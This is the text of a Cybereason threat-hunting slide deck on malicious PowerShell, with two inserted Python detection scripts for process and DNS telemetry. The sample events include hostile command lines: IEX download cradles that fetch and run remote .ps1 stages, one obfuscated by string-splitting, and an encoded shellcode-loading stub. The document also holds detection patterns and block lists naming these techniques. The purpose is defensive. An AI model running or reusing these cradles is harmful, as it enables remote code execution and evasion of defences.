Date posted: 08-Apr-2017
Category: Technology
Uploaded by: cybereason
#whoami
Brad Mecha, Hunting Team Manager at Cybereason
Former Technology Consultant / Cyber Defense at RSA
Former CIRT Lead at a global advanced manufacturing organization
Why we’re here today
Quick Hunting Refresher
I’m Hunting!! Now What?
Giving Back & Process Integration
Expanded PowerShell Use Case
Refresher: Hunting defined.
The process of proactively discovering undesirable activity to elicit a positive outcome.
Refresher: Why?
Prepare: it's very hard to defend what you can't see and don't understand.
Be proactive: don't wait for something bad to happen and then have to react to fix it.
Fix stuff, especially before it breaks!
Adapt or Perish. Learning is discovery, the discovery of the cause of our ignorance. However, the best way of learning is not the computation of information. Learning is discovering, uncovering what is there in us. When we discover, we are uncovering our own ability, our own eyes, in order to find our potential, to see what is going on, to discover how we can enlarge our lives, to find means at our disposal that will let us cope with a difficult situation.
--Bruce Lee
I’m Hunting! Now What? We’re Giving Back!
Incidents
Detection Improvements / New Collection Techniques
Prevention w/ Confidence
Config Management / Compliance / Audit
Improve Response / Triage
[Figure: the Hunting Process drawn alongside the Incident Response Process, with feedback arrows between them]
Hunting Process: Motivation + Hypothesis → Data Collection → Tooling / Analysis → Outcomes → Automation*
Incident Response Process: Prepare → Detect → Respond (Contain / Eradicate) → Post-Mortem / Prevent
Hunting feeds IR: Escalated Incidents; High-Fidelity Detections
IR feeds Hunting: blind spots and gaps become sources of Motivation and Hypotheses
Shared outcomes: New Data Collection and Analysis Techniques; Improved Triage and Response SOPs
Hunting: A Deeper Dive
Previous outcomes create new Motivation + Hypotheses
Introducing new datasets expands previous outcomes
Data stacking becomes more crucial on the journey from analysis toward data science
© 2015 Cybereason Inc. All rights reserved.
PowerShell hunting use case (mind map, flattened)
Fileless Techniques → Process Execution | Network Comms | Persistence
Process Execution
  Hidden / Obfuscated / Encoded:
    commandLine: hidden|1|-nop|iex|-invoke|ICM|scriptblock
    commandLine: `|1|^|+|$|*|&|.
    commandLine: nop|nonl|nol|bypass|e|enc|ec
  Download Commands:
    commandLine: DownloadFile|IWR|Invoke-WebRequest|IRM|Invoke-RestMethod|DownloadString|BITS
  Shellcode / DLL Execution:
    commandLine: dllimport|virtualalloc
  Parent / Child Profiling:
    Parent: wscript|mshta|MSOffice|Browser|WMI*
Network Comms
  Int2Ext Profiling: Connections → Filter: isExternalConnection:true; URL: .ps*
  DNS Queries: TXT C2; Received vs Transmitted Ratios
Persistence
  Registry = commandLine: powershell or .ps*
  Services = commandLine: powershell or .ps*
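The Process Execution branch of the map is a set of command-line and parent-process selectors. As an added example (not Cybereason's query language or code), the script below turns those token lists into detection logic run over constructed process-creation events: it decodes -EncodedCommand payloads before matching (otherwise -enc hides every other token), counts the slide's obfuscation characters against a threshold, checks the parent against the wscript/mshta/MSOffice/Browser/WMI list, and stacks parents so rare launch paths stand out. The regexes, process names, threshold and sample events are my assumptions, not taken from the slides.

```python
"""Hunt PowerShell process-creation telemetry for the Process Execution indicators.

Added example, not Cybereason code. Regexes translate the slide's commandLine:/Parent:
token lists; the threshold and sample events are constructed assumptions.
"""
import base64
import re
from collections import Counter

# One indicator group per leaf of the Process Execution node.
INDICATORS = {
    # hidden window, no profile, non-interactive, no logo, execution-policy bypass
    "launch_flags": re.compile(
        r"(?i)(?:^|\s)-(?:w(?:indowstyle)?\s+(?:hidden|1)\b|nop(?:rofile)?\b"
        r"|noni(?:nteractive)?\b|nol(?:ogo)?\b|(?:ep|exec|executionpolicy)\s+bypass\b)"
    ),
    # iex / icm / scriptblock style invocation
    "invocation": re.compile(r"(?i)\b(?:iex|invoke-expression|icm|invoke-command|scriptblock)\b"),
    # download cradles, including BITS
    "download_cradle": re.compile(
        r"(?i)\b(?:downloadfile|downloadstring|iwr|invoke-webrequest|irm|invoke-restmethod"
        r"|start-bitstransfer|net\.webclient)\b"
    ),
    # in-memory shellcode / DLL loading through P/Invoke
    "shellcode_dll": re.compile(r"(?i)\b(?:dllimport|virtualalloc)\b"),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# Obfuscation characters from the slide, minus "." which is too common to count.
OBFUSCATION_CHARS = set("`^+$*&")
OBFUSCATION_THRESHOLD = 8  # assumption: baseline this against your own fleet
# Parents that rarely have a legitimate reason to spawn PowerShell (the Parent: query).
SUSPICIOUS_PARENTS = {
    "wscript.exe", "mshta.exe",                                 # script hosts
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",   # MS Office
    "iexplore.exe", "chrome.exe", "firefox.exe",                 # browsers
    "wmiprvse.exe",                                              # WMI*
}


def is_powershell(command_line):
    """The 'commandline:powershell or .ps*' selector from the map."""
    return re.search(r"(?i)\bpowershell(?:_ise)?(?:\.exe)?\b|\.ps[md]?1\b", command_line) is not None


def decode_encoded_command(command_line):
    """Return the UTF-16LE plaintext behind an -EncodedCommand argument, or None."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return the indicator names that fire on one process-creation event."""
    cmd = event["command_line"]
    if not is_powershell(cmd):
        return []
    hits = []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        hits.append("encoded_command")
    # Drop the base64 blob (its '+' signs are not obfuscation) and scan the decoded payload instead.
    stripped = ENCODED_FLAG.sub(" -enc <base64>", cmd)
    text = stripped if decoded is None else f"{stripped} {decoded}"
    hits += [name for name, pattern in INDICATORS.items() if pattern.search(text)]
    if sum(text.count(ch) for ch in OBFUSCATION_CHARS) >= OBFUSCATION_THRESHOLD:
        hits.append("obfuscation_chars")
    parent = event["parent"].lower()
    if parent in SUSPICIOUS_PARENTS:
        hits.append(f"suspicious_parent:{parent}")
    return hits


def stack_parents(events):
    """Data stacking: count which parents launch PowerShell so rare pairs stand out."""
    return Counter(e["parent"].lower() for e in events if is_powershell(e["command_line"]))


# Constructed payload for the encoded sample; encoding it here keeps the example offline.
SAMPLE_PAYLOAD = (
    "$c='[DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc("
    "IntPtr a,uint s,uint t,uint p);'; Add-Type -MemberDefinition $c -Name W -Namespace K"
)
ENCODED_SAMPLE = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"id": 1, "parent": "explorer.exe",
     "command_line": r"powershell.exe -File C:\Scripts\Get-Inventory.ps1"},
    {"id": 2, "parent": "WINWORD.EXE",
     "command_line": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://192.0.2.5/stage2.ps1')\""},
    {"id": 3, "parent": "WmiPrvSE.exe",
     "command_line": "powershell.exe -NoP -NonI -W Hidden -Enc " + ENCODED_SAMPLE},
    {"id": 4, "parent": "mshta.exe",
     "command_line": "powershell.exe -ep bypass -w 1 -c \"&('i'+'e'+'x') ((&('New'+'-Ob'+'ject') "
                     "('Ne'+'t.Web'+'Client')).('Down'+'loadSt'+'ring').Invoke('http://192.0.2.10/a.ps1'))\""},
    {"id": 5, "parent": "services.exe",
     "command_line": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["id"], event["parent"], analyze_event(event))
    print(stack_parents(SAMPLE_EVENTS).most_common())
```

Event 4 shows why the obfuscation-character count belongs in the map: the string-splitting hides "iex", "New-Object" and "DownloadString" from every keyword pattern, and only the density of `+` and `&` plus the mshta.exe parent remains. Event 3 shows the opposite: nothing in the raw command line mentions DllImport or VirtualAlloc until the -Enc argument is decoded.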
Giving Back… Incident Escalation
Incident 1: PowerShell WebClient – downloading a stage-2 payload
Incident 2: Remote .ps* file execution / invoking shellcode
Incident 3: Mismatched services – adversarial use of .ps*
Incident 4: Data exfiltration – PowerShell BITSTransfer
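Incidents 1 and 4 were both caught through PowerShell's network footprint, which is the Network Comms branch of the map: internal-to-external connections, URLs ending in .ps*, and DNS TXT traffic whose received-to-transmitted ratio is out of proportion. As an added example (not Cybereason code), the script below applies those three profiles to constructed per-process connection and DNS records; the record fields, the TXT-share and byte-ratio thresholds, and the sample values are my assumptions.

```python
"""Profile PowerShell's network footprint: Int2Ext connections, .ps* URLs, DNS TXT ratios.

Added example, not Cybereason code. Record fields, thresholds and sample data are
constructed assumptions about what an EDR exposes per process.
"""
import re
from collections import defaultdict

# URL: .ps* -- a script being pulled down (.ps1 / .psm1 / .psd1, allowing a query string)
SCRIPT_URL = re.compile(r"(?i)\.ps[md]?1(?:$|[?#])")


def powershell_external_connections(connections):
    """Int2Ext profiling: PowerShell processes talking to addresses outside the network."""
    return [c for c in connections
            if c["image"].lower().startswith("powershell") and c["is_external"]]


def fetches_script(connection):
    """True when the connection's URL points at a PowerShell script file."""
    url = connection.get("url")
    return bool(url) and SCRIPT_URL.search(url) is not None


def dns_profile(queries):
    """Per-process DNS stats: TXT share of queries and received/transmitted byte ratio."""
    stats = defaultdict(lambda: {"total": 0, "txt": 0, "rx": 0, "tx": 0})
    for q in queries:
        s = stats[q["pid"]]
        s["total"] += 1
        if q["qtype"].upper() == "TXT":
            s["txt"] += 1
        s["rx"] += q["bytes_rx"]
        s["tx"] += q["bytes_tx"]
    for s in stats.values():
        s["txt_share"] = s["txt"] / s["total"]
        s["rx_tx_ratio"] = s["rx"] / s["tx"] if s["tx"] else float("inf")
    return dict(stats)


def flag_txt_c2(profile, min_txt_share=0.5, min_rx_tx=3.0, min_queries=10):
    """Processes whose DNS is mostly TXT and answer-heavy: the shape of TXT-record C2.

    Thresholds are assumptions; baseline them against hosts you know are clean.
    """
    return sorted(pid for pid, s in profile.items()
                  if s["total"] >= min_queries
                  and s["txt_share"] >= min_txt_share
                  and s["rx_tx_ratio"] >= min_rx_tx)


# Constructed records, not real telemetry.
CONNECTIONS = [
    {"pid": 4242, "image": "powershell.exe", "remote": "198.51.100.7:443",
     "is_external": True, "url": "https://198.51.100.7/u/stage2.ps1"},
    {"pid": 4242, "image": "powershell.exe", "remote": "10.0.0.12:445",
     "is_external": False, "url": None},
    {"pid": 1200, "image": "chrome.exe", "remote": "203.0.113.9:443",
     "is_external": True, "url": "https://example.com/"},
]

DNS_QUERIES = (
    # pid 4242: thirty TXT lookups of encoded subdomains, answers far larger than queries
    [{"pid": 4242, "qtype": "TXT", "qname": f"{i:04x}.c2.example.net", "bytes_tx": 70, "bytes_rx": 380}
     for i in range(30)]
    + [{"pid": 4242, "qtype": "A", "qname": "time.windows.com", "bytes_tx": 60, "bytes_rx": 90}
       for _ in range(2)]
    # pid 1200: ordinary browser A lookups
    + [{"pid": 1200, "qtype": "A", "qname": "example.com", "bytes_tx": 60, "bytes_rx": 90}
       for _ in range(12)]
)

if __name__ == "__main__":
    for conn in powershell_external_connections(CONNECTIONS):
        print("external:", conn["pid"], conn["remote"], "script" if fetches_script(conn) else "")
    profile = dns_profile(DNS_QUERIES)
    for pid, s in profile.items():
        print(pid, f"txt_share={s['txt_share']:.2f}", f"rx/tx={s['rx_tx_ratio']:.2f}")
    print("TXT C2 candidates:", flag_txt_c2(profile))
```

The two DNS measures reinforce each other: a legitimate process may issue the odd TXT query (SPF, DKIM), but it will not issue almost nothing else, and its answers will not be several times the size of its questions for query after query.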
Giving Back… Prevention
1. Block execution of PowerShell.exe on all systems where it is not used for administrative purposes
2. Enforce specific parent/child process relationships: block MSOffice | Wscript | Mshta | Browsers | WMI from spawning PowerShell.exe
3. Anchor PowerShell scripts to specific server directories; block .ps* files from running directly on a system anywhere else
4. Use the endpoint firewall to prevent powershell.exe from connecting to non-approved IPs
5. Block "Bypass", "Hidden", "DownloadString", "WebClient", "DllImport" and "VirtualAlloc" as command-line arguments when executed by an unauthorized user
6. See #2 for allowing valid applications